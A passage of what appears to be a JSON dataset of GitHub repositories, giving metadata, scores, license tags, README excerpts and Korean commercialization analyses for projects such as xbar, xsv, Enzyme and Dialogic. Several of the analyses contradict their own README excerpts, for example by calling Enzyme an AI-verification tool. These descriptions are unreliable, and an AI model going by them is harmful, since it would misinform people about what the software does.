https://img.shields.io/badge/user%20guide-sanic-ff0068\n   :target: https://sanic.dev/\n.. |Forums| image:: https://img.shields.io/badge/forums-community-ff0068.svg\n   :target: https://community.sanicframework.org/\n.. |Discord| image:: https://img.shields.io/discord/812221182594121728?logo=discord&label=Discord&color=5865F2\n   :target: https://discord.gg/FARQzAEMAA\n..","composite_score":0.2792,"license_safety_tag":"safe"},{"name":"SebastianAigner/advent-of-code-2021","github_url":"https://github.com/SebastianAigner/advent-of-code-2021","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":14,"description":"# SebastianAigner/advent-of-code-2021 보물 분석\n\n## 왜 보물인가\n매년 수천 명의 개발자가 참여하는 프로그래밍 챌린지 문제 해결 방법을 정리한 레퍼런스로, 코딩 학습 및 면접 준비용 교육 콘텐츠로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급자용 알고리즘 문제 풀이 튜토리얼 및 풀이","readme_excerpt":"","composite_score":0.279,"license_safety_tag":"unknown"},{"name":"matryer/bitbar","github_url":"https://github.com/matryer/bitbar","stars":6,"language":"Go","license":"mit","abandonment_months":21,"description":"# BitBar 상품화 분석\n\n## 왜 보물인가\n맥(Apple) 컴퓨터의 상단 메뉴바에 실시간 정보(주식, 날씨, 업무 상태 등)를 간단히 표시해주는 가벼운 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 주식 투자자 대상 \"실시간 포트폴리오 모니터링 메뉴바 앱\" 구독 서비스\n2. **내부 업무 도구**: 회사 직원들이 업무 중 메뉴바","readme_excerpt":"[![](xbarapp.com/public/img/xbar-menu-preview.png)](https://xbarapp.com/)\n\n# Welcome to xbar\n\nxbar (the BitBar reboot) lets you put the output from any script/program in your macOS menu bar.\n\n  * **Complete rewrite from the ground up** - in Go by @matryer and @leaanthony - using [Wails.app (build cross-platform desktop apps using Go & HTML/CSS/JS)](https://wails.app)\n  * Completely open source\n  * [Download latest xbar release](https://github.com/matryer/xbar/releases/latest) - requires macOS Catalina or newer (>= 10.15)\n  * [Visit the app homepage at https://xbarapp.com](https://xbarapp.com)\n  * [Get started](#get-started) and [installing plugins](#installing-plugins)\n\nDigging deeper:\n\n  * [Browse plugin repository](https://xbarapp.com/)\n  * [Guide to writing your own plugins](https://github.com/matryer/xbar-plugins/blob/main/CONTRIBUTING.md)\n\nAnd finally...\n\n  * [Read the story about how xbar unexpectedly got going](https://medium.com/@matryer/what-happens-when-your-old-open-source-p","composite_score":0.2789,"license_safety_tag":"safe"},{"name":"redis/redis-om-node","github_url":"https://github.com/redis/redis-om-node","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# redis/redis-om-node 분석\n\n## 왜 보물인가\n빠른 데이터 저장소(Redis)를 쉽게 사용할 수 있도록 만든 도구로, 웹 애플리케이션의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **실시간 채팅 SaaS**: 메시지를 빠르게 저장하고 불러오는 서비스로 사용자 경험 개선\n- **전자상거래 내부 도구**: 재고 관리 시","readme_excerpt":"<div align=\"center\">\n  <br/>\n  <br/>\n  <img width=\"360\" src=\"logo.svg\" alt=\"Redis OM\" />\n  <br/>\n  <br/>\n</div>\n\n<p align=\"center\">\n    <p align=\"center\">\n        Object mapping, and more, for Redis and Node.js. Written in TypeScript.\n    </p>\n</p>\n\n---\n[![Discord][discord-shield]][discord-url]\n[![Twitch][twitch-shield]][twitch-url]\n[![YouTube][youtube-shield]][youtube-url]\n[![Twitter][twitter-shield]][twitter-url]\n\n[![NPM][package-shield]][package-url]\n[![Build][build-shield]][build-url]\n[![License][license-shield]][license-url]\n\n**Redis OM for Node.js** makes it easy to model Redis data in your Node.js applications.\n\n[Redis OM .NET][redis-om-dotnet] | **Redis OM Node.js** | [Redis OM Python][redis-om-python] | [Redis OM Spring][redis-om-spring]\n\n<details>\n  <summary><strong>Table of contents</strong></summary>\n\n  - [Redis OM for Node.js](#redis-om-for-nodejs)\n  - [Getting Started](#getting-started)\n  - [Connect to Redis with Node Redis](#connect-to-redis-with-node-redis)\n    - [Redis","composite_score":0.2789,"license_safety_tag":"safe"},{"name":"C0B1T0/simplefolio","github_url":"https://github.com/C0B1T0/simplefolio","stars":8,"language":"SCSS","license":"MIT","abandonment_months":4,"description":"# simplefolio 상업화 분석\n\n## 왜 보물인가\n누구나 몇 분 안에 전문가 수준의 포트폴리오 웹사이트를 만들 수 있는 간단한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리랜서와 구직자를 위한 포트폴리오 자동 생성 구독 서비스\n2. **내부 업무 도구**: 기업의 직원 프로필 및 프로젝트 포트폴리오 자동 관리 시스템\n3.","readme_excerpt":"# Simplefolio ⚡️ [![GitHub](https://img.shields.io/github/license/cobiwave/simplefolio?color=blue)](https://github.com/cobiwave/simplefolio/blob/master/LICENSE.md) ![GitHub stars](https://img.shields.io/github/stars/cobiwave/simplefolio) ![GitHub forks](https://img.shields.io/github/forks/cobiwave/simplefolio)\n\n## A minimal portfolio template for Developers!\n\n<h2 align=\"center\">\n  <img src=\"https://github.com/cobiwave/gatsby-simplefolio/blob/master/examples/example.gif\" alt=\"Simplefolio\" width=\"600px\" />\n  <br>\n</h2>\n\n## Features\n\n⚡️ Modern UI Design + Reveal Animations\\\n⚡️ One Page Layout\\\n⚡️ Styled with Bootstrap v4.3 + Custom SCSS\\\n⚡️ Fully Responsive\\\n⚡️ Valid HTML5 & CSS3\\\n⚡️ Optimized with Parcel\\\n⚡️ Well organized documentation\n\nTo view the demo: **[click here](https://the-simplefolio.netlify.app/)**\n\n---\n\n## Why do you need a portfolio? ☝️\n\n- Professional way to showcase your work\n- Increases your visibility and online presence\n- Shows you’re more than just a resume\n\n## Getting","composite_score":0.2787,"license_safety_tag":"safe"},{"name":"cobidev/simplefolio","github_url":"https://github.com/cobidev/simplefolio","stars":5,"language":"SCSS","license":"MIT","abandonment_months":4,"description":"# simplefolio 상용화 분석\n\n## 왜 보물인가\n누구나 몇 분 안에 전문가 수준의 포트폴리오 웹사이트를 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리랜서·취업준비생이 구독하는 \"포트폴리오 빌더\" 플랫폼으로 월정액 제공\n2. **내부 업무 도구**: 광고사·디자인 회사의 직원들이 클라이언트 포트폴리오를 빠르","readme_excerpt":"# Simplefolio ⚡️ [![GitHub](https://img.shields.io/github/license/cobiwave/simplefolio?color=blue)](https://github.com/cobiwave/simplefolio/blob/master/LICENSE.md) ![GitHub stars](https://img.shields.io/github/stars/cobiwave/simplefolio) ![GitHub forks](https://img.shields.io/github/forks/cobiwave/simplefolio)\n\n## A minimal portfolio template for Developers!\n\n<h2 align=\"center\">\n  <img src=\"https://github.com/cobiwave/gatsby-simplefolio/blob/master/examples/example.gif\" alt=\"Simplefolio\" width=\"600px\" />\n  <br>\n</h2>\n\n## Features\n\n⚡️ Modern UI Design + Reveal Animations\\\n⚡️ One Page Layout\\\n⚡️ Styled with Bootstrap v4.3 + Custom SCSS\\\n⚡️ Fully Responsive\\\n⚡️ Valid HTML5 & CSS3\\\n⚡️ Optimized with Parcel\\\n⚡️ Well organized documentation\n\nTo view the demo: **[click here](https://the-simplefolio.netlify.app/)**\n\n---\n\n## Why do you need a portfolio? ☝️\n\n- Professional way to showcase your work\n- Increases your visibility and online presence\n- Shows you’re more than just a resume\n\n## Getting","composite_score":0.2787,"license_safety_tag":"safe"},{"name":"ldez/prm","github_url":"https://github.com/ldez/prm","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":7,"description":"# ldez/prm 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발 과정에서 반복되는 작업을 자동화할 수 있는 도구로, 개발팀의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 회사들이 자신의 개발 프로세스 자동화 기능을 제품에 내장하여 고객에게 제공\n2. **내부 업무 도구**: 대규모 IT팀이 코드 ","readme_excerpt":"# PRM - Pull Request Manager\n\n[![ArchLinux (AUR)](https://img.shields.io/aur/version/prm.svg?style=flat)](https://aur.archlinux.org/packages/prm)\n[![Homebrew Taps](https://img.shields.io/github/release/ldez/prm.svg?label=Homebrew%20Taps&style=flat)](https://github.com/ldez/homebrew-tap)\n[![Scoop Main Bucket](https://img.shields.io/github/release/ldez/prm.svg?label=Scoop%20Main%20Bucket&style=flat)](https://github.com/lukesampson/scoop)\n[![Scoop Bucket](https://img.shields.io/github/release/ldez/prm.svg?label=Scoop%20Bucket&style=flat)](https://github.com/ldez/scoop-bucket)\n[![release](https://img.shields.io/github/release/ldez/prm.svg?style=flat)](https://github.com/ldez/prm/releases)\n\n[![Sponsor](https://img.shields.io/badge/Sponsor%20me-%E2%9D%A4%EF%B8%8F-pink)](https://github.com/sponsors/ldez)\n\n[![Build Status](https://github.com/ldez/prm/workflows/Main/badge.svg?branch=master)](https://github.com/ldez/prm/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ldez/p","composite_score":0.2786,"license_safety_tag":"safe"},{"name":"BurntSushi/xsv","github_url":"https://github.com/BurntSushi/xsv","stars":7,"language":"Rust","license":"unlicense","abandonment_months":13,"description":"# BurntSushi/xsv 분석 보고서\n\n## 왜 보물인가\n엑셀이나 CSV 파일을 명령어로 빠르게 검색, 정렬, 분석할 수 있는 도구로, 대량의 데이터를 다루는 직장인들의 업무 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업 고객들이 대용량 CSV 파일을 웹 브라우저에서 업로드하여 자동으로 정렬·검색","readme_excerpt":"# `xsv` is now unmaintained\n\nIn lieu of `xsv`, I'd recommend either\n[qsv](https://github.com/dathere/qsv)\nor\n[xan](https://github.com/medialab/xan).\n\n-------------------------------------------------------------------------------\n\n\nxsv is a command line program for indexing, slicing, analyzing, splitting\nand joining CSV files. Commands should be simple, fast and composable:\n\n1. Simple tasks should be easy.\n2. Performance trade offs should be exposed in the CLI interface.\n3. Composition should not come at the expense of performance.\n\nThis README contains information on how to\n[install `xsv`](https://github.com/BurntSushi/xsv#installation), in addition to\na quick tour of several commands.\n\n[![Linux build status](https://api.travis-ci.org/BurntSushi/xsv.svg)](https://travis-ci.org/BurntSushi/xsv)\n[![Windows build status](https://ci.appveyor.com/api/projects/status/github/BurntSushi/xsv?svg=true)](https://ci.appveyor.com/project/BurntSushi/xsv)\n[![](https://meritbadge.herokuapp.com/xsv)](h","composite_score":0.2783,"license_safety_tag":"unknown"},{"name":"energicryptocurrency/energi","github_url":"https://github.com/energicryptocurrency/energi","stars":8,"language":"Go","license":"lgpl-3.0","abandonment_months":23,"description":"# Energi Cryptocurrency 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래와 지갑 관리를 더 간단하고 안전하게 만들어주는 금융 기술로, 블록체인에 관심 있는 사용자들의 수요가 지속적으로 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래 플랫폼**: 사용자가 Energi 코인을 사고팔고 관리할 수 있는 웹/앱 서비스\n2. *","readme_excerpt":"## Energi Core\n\nOfficial golang implementation of the Energi Core based on Ethereum protocol.\n\n## Building the source\n\n### Build with Makefile\n\n    make all\n\n### (Optional) Build with Docker\n\nA consistent build environment can be provided with Docker. Release builds are produced through this process.\n\n    docker build -t energi3 .\n\n## Executables\n\nThe Energi Core project comes with several wrappers/executables found in the `cmd` directory.\n\n| Command    | Description |\n|:----------:|-------------|\n| **`energi3`** | Our main Energi CLI client. It is the entry point into the Energi network (main-, test- or private net), capable of running as a full node (default), archive node (retaining all historical state) or a light node (retrieving data live). It can be used by other processes as a gateway into the Energi network via JSON RPC endpoints exposed on top of HTTP, WebSocket and/or IPC transports. `energi3 --help` and the [CLI Wiki page](https://github.com/ethereum/go-ethereum/wiki/Comman","composite_score":0.2782,"license_safety_tag":"restricted"},{"name":"react-spring/react-three-fiber","github_url":"https://github.com/react-spring/react-three-fiber","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"<h1>@react-three/fiber</h1>\n\n[![Version](https://img.shields.io/npm/v/@react-three/fiber?style=flat&colorA=000000&colorB=000000)](https://npmjs.com/package/@react-three/fiber)\n[![Downloads](https://img.shields.io/npm/dt/@react-three/fiber.svg?style=flat&colorA=000000&colorB=000000)](https://npmjs.com/package/@react-three/fiber)\n[![Twitter](https://img.shields.io/twitter/follow/pmndrs?label=%40pmndrs&style=flat&colorA=000000&colorB=000000&logo=twitter&logoColor=000000)](https://twitter.com/pmndrs)\n[![Discord](https://img.shields.io/discord/740090768164651008?style=flat&colorA=000000&colorB=000000&label=discord&logo=discord&logoColor=000000)](https://discord.gg/ZZjjNvJ)\n[![Open Collective](https://img.shields.io/opencollective/all/react-three-fiber?style=flat&colorA=000000&colorB=000000)](https://opencollective.com/react-three-fiber)\n[![ETH](https://img.shields.io/badge/ETH-f5f5f5?style=flat&colorA=000000&colorB=000000)](https://blockchain.com/eth/address/0x6E3f79Ea1d0dcedeb33D3fC6c34d2B","composite_score":0.2782,"license_safety_tag":"safe"},{"name":"amiremohamadi/tunl","github_url":"https://github.com/amiremohamadi/tunl","stars":54,"language":"Rust","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.278,"license_safety_tag":"unknown"},{"name":"keijiro/BibcamVfx","github_url":"https://github.com/keijiro/BibcamVfx","stars":14,"language":"C#","license":"unknown","abandonment_months":14,"description":"# BibcamVfx 분석 리포트\n\n## 왜 보물인가\n카메라로 촬영한 영상에 디지털 효과를 자동으로 입혀주는 기술로, 영화나 광고 제작 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 영상 편집 플랫폼 (SaaS)**: 누구나 전문적인 영상 효과를 쉽게 만들 수 있는 웹 서비스로 운영\n2. **광고 제작사 내부 도구**: 광고 에","readme_excerpt":"# Metavido VFX\n\n![gif](https://github.com/user-attachments/assets/124a2b96-76d0-4e2a-8761-d2cc4ee1df72)\n![gif](https://github.com/user-attachments/assets/078d9368-25ff-4fa8-99ed-0dbfadfc02b9)\n\n**Metavido VFX** is a demonstration project that visualizes volumetric videos captured\nwith an iPhone Pro using its LiDAR sensor. It utilizes Unity’s VFX Graph and WebGPU to\ncreate visually striking effects.\n\n## Related Project\n\n**Metavido** is an experimental project that captures volumetric videos with camera\ntracking data using a burnt-in barcode extension. Please refer to the\n[Metavido repository] for further details.\n\n[Metavido repository]: https://github.com/keijiro/Metavido\n\n## System Requirements\n\n- Unity 6\n- VFX Graph with URP or HDRP\n\n## Web Browser Demo\n\nA WebGPU build is available on [Unity Play].\n\n[Unity Play]: https://play.unity.com/games/f4e0ea34-bd6d-4b2d-b24d-69ffa6e88795/metavido\n\nTo run it in your web browser, your environment must support WebGPU. It works on most\ndesktop brows","composite_score":0.277,"license_safety_tag":"unknown"},{"name":"spearow/juice","github_url":"https://github.com/spearow/juice","stars":8,"language":"Rust","license":"unknown","abandonment_months":22,"description":"# spearow/juice 분석 리포트\n\n## 왜 보물인가\n직관적인 인터페이스로 복잡한 데이터 처리 작업을 간단하게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 마케팅 회사가 고객의 광고 데이터를 자동으로 정리하고 분석해주는 대시보드 서비스\n2. **내부 업무 도구**: 온라인 쇼핑몰이 매일 수백 개의 주문 정","readme_excerpt":"# Juice\n\nThis is the workspace project for\n\n* [juice](https://github.com/spearow/juice/blob/master/juice/README.md) - machine learning frameworks for hackers\n* [coaster](https://github.com/spearow/juice/blob/master/coaster/README.md) - underlying math abstraction\n* [coaster-nn](https://github.com/spearow/juice/blob/master/coaster-nn/README.md)\n* [coaster-blas](https://github.com/spearow/juice/blob/master/coaster-blas/README.md)\n* [greenglas](https://github.com/spearow/juice/blob/master/greenglas/README.md) - a data preprocessing framework\n* [juice-examples](https://github.com/spearow/juice/blob/master/juice-examples/README.md) - mnist demo\n\n Please consult the individual README.md files for more information.\n\n## [Juice](https://github.com/spearow/juice) Examples\n\nCLI for running [juice](https://github.com/spearow/juice) examples. More examples and benchmark tests can be found at the [juice examples directory](https://github.com/spearow/juice#examples).\n\n### Install CLI\n\n**DISCLAIMER: C","composite_score":0.2764,"license_safety_tag":"unknown"},{"name":"cognitect-labs/REBL-distro","github_url":"https://github.com/cognitect-labs/REBL-distro","stars":12,"language":"","license":"unknown","abandonment_months":23,"description":"# REBL-distro 분석\n\n## 왜 보물인가\n프로그래밍 작업 시 데이터를 시각적으로 탐색하고 이해할 수 있게 해주는 개발자 도구로, 복잡한 정보를 직관적으로 파악하는 데 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼에 내장하여 고객이 복잡한 결과값을 쉽게 시각화하고 탐색하게 해주는 부가 기능\n2. **내부","readme_excerpt":"# NOTE: REBL has been superseded by Morse\n\nInstead use: https://github.com/nubank/morse\n\n# `REBL`\n\nREBL is a graphical, interactive tool for browsing Clojure data. REBL is extracted from Datomic tools developed by the [Datomic Team](https://www.datomic.com/) at [Cognitect](https://cognitect.com), and is available for non-commercial use (per the EULA) free of charge. We hope that many Clojure developers will find it useful. \n\n## Features\n\n* A two-pane browser/viewer system for viewing collections and their contents\n* Navigation into and back out of nested collections\n* A structured editor pane for entering expressions to be evaluated\n* A root browse of a history of expression evaluations\n* The ability to 'wrap' a stdio based REPL (e.g. Clojure's native REPL) so that it can monitor and display the interactions therein, while still allowing them to flow back to the host (e.g. the editor)\n* When used with non-stdio repls (e.g. nREPL), can be launched a la carte and accepts values to inspec","composite_score":0.2763,"license_safety_tag":"unknown"},{"name":"airbnb/enzyme","github_url":"https://github.com/airbnb/enzyme","stars":5,"language":"JavaScript","license":"mit","abandonment_months":7,"description":"# Enzyme 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 결과물이 정말 맞는지 자동으로 검증해주는 도구로, 회사들이 AI 오류로 인한 손실을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 AI 챗봇 서비스**: 고객 질문에 대한 AI 답변이 올바른지 실시간 검증하는 SaaS\n2. **기업용 데이터 분석 플랫폼**: 분석 결과의 정확","readme_excerpt":"Enzyme\n=======\n\n[![Join the chat at https://gitter.im/enzymejs/enzyme](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/enzymejs/enzyme?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n[![npm Version](https://img.shields.io/npm/v/enzyme.svg)](https://www.npmjs.com/package/enzyme) [![License](https://img.shields.io/npm/l/enzyme.svg)](https://github.com/enzymejs/enzyme/blob/master/LICENSE.md) [![Build Status](https://travis-ci.org/enzymejs/enzyme.svg)](https://travis-ci.org/enzymejs/enzyme) [![Coverage Status](https://codecov.io/gh/enzymejs/enzyme/branch/master/graph/badge.svg)](https://codecov.io/gh/enzymejs/enzyme/branch/master)\n\n\nEnzyme is a JavaScript Testing utility for React that makes it easier to test your React Components' output.\nYou can also manipulate, traverse, and in some ways simulate runtime given the output.\n\nEnzyme's API is meant to be intuitive and flexible by mimicking jQuery's API for DOM manipulation\nand traversal.\n\nUpgrading f","composite_score":0.2761,"license_safety_tag":"safe"},{"name":"esimov/caire","github_url":"https://github.com/esimov/caire","stars":5,"language":"Go","license":"MIT","abandonment_months":13,"description":"# esimov/caire 분석\n\n## 왜 보물인가\n사진을 자동으로 똑똑하게 압축해서 중요한 부분은 살리고 불필요한 부분만 제거하는 기술로, 웹사이트나 앱의 이미지 용량을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼이 상품 사진을 자동 최적화하여 페이지 로딩 속도를 개선하는 클라우드 도구\n- **내","readme_excerpt":"<h1 align=\"center\"><img alt=\"Caire Logo\" src=\"https://user-images.githubusercontent.com/883386/51555990-a1762600-1e81-11e9-9a6a-0cd815870358.png\" height=\"180\"></h1>\n\n[![build](https://github.com/esimov/caire/actions/workflows/build.yml/badge.svg)](https://github.com/esimov/caire/actions/workflows/build.yml)\n[![Go Reference](https://pkg.go.dev/badge/github.com/esimov/caire.svg)](https://pkg.go.dev/github.com/esimov/caire)\n[![license](https://img.shields.io/github/license/esimov/caire)](./LICENSE)\n[![release](https://img.shields.io/badge/release-v1.5.0-blue.svg)](https://github.com/esimov/caire/releases/tag/v1.5.0)\n[![homebrew](https://img.shields.io/badge/homebrew-v1.5.0-orange.svg)](https://formulae.brew.sh/formula/caire)\n[![caire](https://snapcraft.io/caire/badge.svg)](https://snapcraft.io/caire)\n\n**Caire** is a content aware image resize library based on *[Seam Carving for Content-Aware Image Resizing](https://inst.eecs.berkeley.edu/~cs194-26/fa16/hw/proj4-seamcarving/imret.pdf)* pap","composite_score":0.2758,"license_safety_tag":"safe"},{"name":"dubbo/dubbo-spring-boot-project","github_url":"https://github.com/dubbo/dubbo-spring-boot-project","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Dubbo Spring Boot Project 분석\n\n## 왜 보물인가\n여러 컴퓨터를 마치 하나처럼 연결하여 복잡한 온라인 서비스를 쉽게 만들 수 있는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **마이크로서비스 SaaS**: 전자상거래 플랫폼에서 상품 검색, 결제, 배송 등 여러 기능을 독립적으로 운영하면서도 연결된 서비스 제공\n2. **금융","readme_excerpt":"# Apache Dubbo Spring Boot Project \n\n## This repo has been archived. All of the implements have been moved to [apache/dubbo](https://github.com/apache/dubbo).\n\n[![Build Status](https://travis-ci.org/apache/dubbo-spring-boot-project.svg?branch=master)](https://travis-ci.org/apache/dubbo-spring-boot-project) \n[![codecov](https://codecov.io/gh/apache/dubbo-spring-boot-project/branch/master/graph/badge.svg)](https://codecov.io/gh/apache/dubbo-spring-boot-project)\n![license](https://img.shields.io/github/license/apache/dubbo-spring-boot-project.svg)\n\n[Apache Dubbo](https://github.com/apache/dubbo) Spring Boot Project makes it easy to create [Spring Boot](https://github.com/spring-projects/spring-boot/) application using Dubbo as RPC Framework. What's more, it also provides:\n* [auto-configure features](dubbo-spring-boot-autoconfigure) (e.g., annotation-driven, auto configuration, externalized configuration).\n* [production-ready features](dubbo-spring-boot-actuator) (e.g., security, health ch","composite_score":0.2754,"license_safety_tag":"safe"},{"name":"notwaldorf/tiny-care-terminal","github_url":"https://github.com/notwaldorf/tiny-care-terminal","stars":5,"language":"JavaScript","license":"mit","abandonment_months":22,"description":"# tiny-care-terminal 상용화 분석\n\n## 왜 보물인가\n직장인들이 업무 중 자신의 건강과 정신 건강을 챙기도록 도와주는 따뜻한 알림 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 웰니스 SaaS**: 회사에서 직원들의 건강 관리를 위해 구독하는 사내 건강 알림 서비스\n2. **개인 생산성 앱**: 개인 사용자가 월 구독으로 자신의 규","readme_excerpt":"# tiny-care-terminal\n\nThis is a little dashboard that tries to take care of you when you're using your terminal. It tells you cute, self care things, and tries not to stress you out. It shows:\n\n- the last tweets from [@tinycarebot](https://twitter.com/tinycarebot), [@selfcare_bot](https://twitter.com/selfcare_bot) and [@magicrealismbot](https://twitter.com/magicrealismbot). The first two tend to tweet reminders about taking breaks, drinking water and looking outside, and the latter tells you strange, whimsical stories. If you don't like these bots, they're configurable!\n- your `git` commits from today and the last 7 days. When I get stressed out because I think I haven't done anything, it turns out that I only think about big and serious commits, and forget about all the tiny amounts of work I've actually done throughout. Hopefully this will help you too <3\n- the weather, because you might get rained on.\n\nIt looks like this, and updates every 20 minutes.\n\n![tiny terminal care screensho","composite_score":0.2752,"license_safety_tag":"safe"},{"name":"Tsukamg/polymarket-weather-trading-engine","github_url":"https://github.com/Tsukamg/polymarket-weather-trading-engine","stars":269,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2751,"license_safety_tag":"safe"},{"name":"sniklaus/3d-ken-burns","github_url":"https://github.com/sniklaus/3d-ken-burns","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":17,"description":"","readme_excerpt":"# 3d-ken-burns\nThis is a reference implementation of 3D Ken Burns Effect from a Single Image [1] using PyTorch. Given a single input image, it animates this still image with a virtual camera scan and zoom subject to motion parallax. Should you be making use of our work, please cite our paper [1].\n\n<a href=\"https://arxiv.org/abs/1909.05483\"><img src=\"http://content.sniklaus.com/kenburns/paper.jpg\" alt=\"Paper\" width=\"100%\"></a>\n\nFor some interesting related work, please see: https://github.com/pierlj/ken-burns-effect\n<br />\nFor some interesting discussions, please see: https://news.ycombinator.com/item?id=20978055\n\n## setup\nSeveral functions are implemented in CUDA using CuPy, which is why CuPy is a required dependency. It can be installed using `pip install cupy` or alternatively using one of the provided [binary packages](https://docs.cupy.dev/en/stable/install.html#installing-cupy) as outlined in the CuPy repository. Please also make sure to have the `CUDA_HOME` environment variable c","composite_score":0.275,"license_safety_tag":"unknown"},{"name":"jinzhu/gorm","github_url":"https://github.com/jinzhu/gorm","stars":23,"language":"Go","license":"mit","abandonment_months":22,"description":"","readme_excerpt":"# GORM\n\nGORM V2 moved to https://github.com/go-gorm/gorm\n\nGORM V1 Doc https://v1.gorm.io/\n","composite_score":0.2749,"license_safety_tag":"safe"},{"name":"coppolaemilio/dialogic","github_url":"https://github.com/coppolaemilio/dialogic","stars":6,"language":"GDScript","license":"MIT","abandonment_months":14,"description":"# coppolaemilio/dialogic 분석\n\n## 왜 보물인가\nAI와 사람이 자연스럽게 대화하는 기능을 쉽게 만들 수 있는 도구로, 챗봇이나 음성 어시스턴트가 필요한 모든 서비스에 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 상담 챗봇**: 쇼핑몰이나 은행이 24시간 자동으로 고객 질문에 답변하는 시스템\n- **음성 주문 앱**: 카","readme_excerpt":"<p align=\"center\">\r\n  <img width=\"1280\" alt=\"cover\" src=\"https://user-images.githubusercontent.com/2206700/189457799-6327bab0-b085-4421-8640-6a18e395d17d.png\">\r\n</p>\r\n\r\n<h1 align=\"center\">Dialogic 2</h1>\r\n\r\n<p align=\"center\">\r\n  Create <b>Dialogs</b>, <b>Visual Novels</b>, <b>RPGs</b>, and <b>manage Characters</b> with Godot to create your Game!\r\n</p>\r\n\r\n<p align=\"center\">\r\n  <a href=\"https://discord.gg/DjcDgDaTMe\" target=\"_blank\" style=\"text-decoration:none\"><img alt=\"Discord\" src=\"https://img.shields.io/discord/628713677239091231?logo=discord&labelColor=CFC9C8&color=646FA9\"></a>\r\n  <a href=\"https://godotengine.org/download/\" target=\"_blank\" style=\"text-decoration:none\"><img alt=\"Godot v4.2+\" src=\"https://img.shields.io/badge/Godot-v4.2+-%23478cbf?labelColor=CFC9C8&color=49A9B4\" /></a>\r\n  <a href=\"https://docs.dialogic.pro/introduction.html\" target=\"_blank\" style=\"text-decoration:none\"><img alt=\"Dialogic 2 Documentation\" src=\"https://img.shields.io/badge/documention-online-green?label","composite_score":0.2749,"license_safety_tag":"safe"},{"name":"bagder/http3-explained","github_url":"https://github.com/bagder/http3-explained","stars":11,"language":"","license":"CC-BY-4.0","abandonment_months":22,"description":"# bagder/http3-explained 분석\n\n## 왜 보물인가\n인터넷 통신의 새로운 표준(HTTP/3)을 누구나 이해할 수 있도록 정리한 교육용 가이드로, 웹 속도 개선에 관심 있는 모든 기업과 개발자의 학습 자료로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **웹 성능 최적화 교육 SaaS**: 기업의 개발팀에게 HTTP/3 도입 방법을 가","readme_excerpt":"**HTTP/3 explained** is a collaborative effort to document the HTTP/3 and the\nQUIC protocols. Join in and help!\n\nGet the Web or PDF versions on\n[http3-explained.haxx.se](https://http3-explained.haxx.se/).\n\nThe contents get updated automatically on every commit to this git repository.\n\n![HTTP/3 explained cover](cover_small.jpg)\n","composite_score":0.2748,"license_safety_tag":"unknown"},{"name":"puikinsh/Adminator-admin-dashboard","github_url":"https://github.com/puikinsh/Adminator-admin-dashboard","stars":5,"language":"HTML","license":"MIT","abandonment_months":1,"description":"# Adminator Admin Dashboard 분석\n\n## 왜 보물인가\n웹사이트나 앱을 관리하는 관리자 화면을 빠르게 만들 수 있는 기성 템플릿으로, 처음부터 직접 만드는 것보다 훨씬 빠르고 저렴하게 관리 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사가 자신의 데이터를 관리하는 대시보드 화면 (예: 매출 ","readme_excerpt":"# Adminator — 2026 Admin Dashboard Template (v4.0.0)\n\n**Adminator 4.0** is a vanilla-JS admin dashboard template with a token-driven CSS-variable design system, dark mode, and zero framework dependencies. **No jQuery. No Bootstrap.** Just clean HTML, modern CSS, and ~700 KB of production JS for the entire 18-page template.\n\n> **Heads up — v4.0.0 is a ground-up rewrite.** New design system, new shell architecture, Bootstrap removed. If you prefer the previous design, the v3 codebase lives on the [`legacy-v3`](https://github.com/puikinsh/Adminator-admin-dashboard/tree/legacy-v3) branch and will continue to receive security updates.\n\n**[adminator.colorlib.com →](https://adminator.colorlib.com/)** · **[Live Demo →](https://preview.colorlib.com/theme/adminator/index.html)** · **[Looking for premium templates? Visit DashboardPack →](https://dashboardpack.com/)**\n\n## Preview\n\n### Light mode\n\n![Adminator 2026 — Light Mode](screenshots/adminator-2026-dashboard-light.png)\n\n### Dark mode\n\n![Admin","composite_score":0.2741,"license_safety_tag":"safe"},{"name":"airbnb/lottie-react-native","github_url":"https://github.com/airbnb/lottie-react-native","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# Lottie React Native 평가 분석\n\n## 왜 보물인가\n휴대폰 앱에서 부드럽고 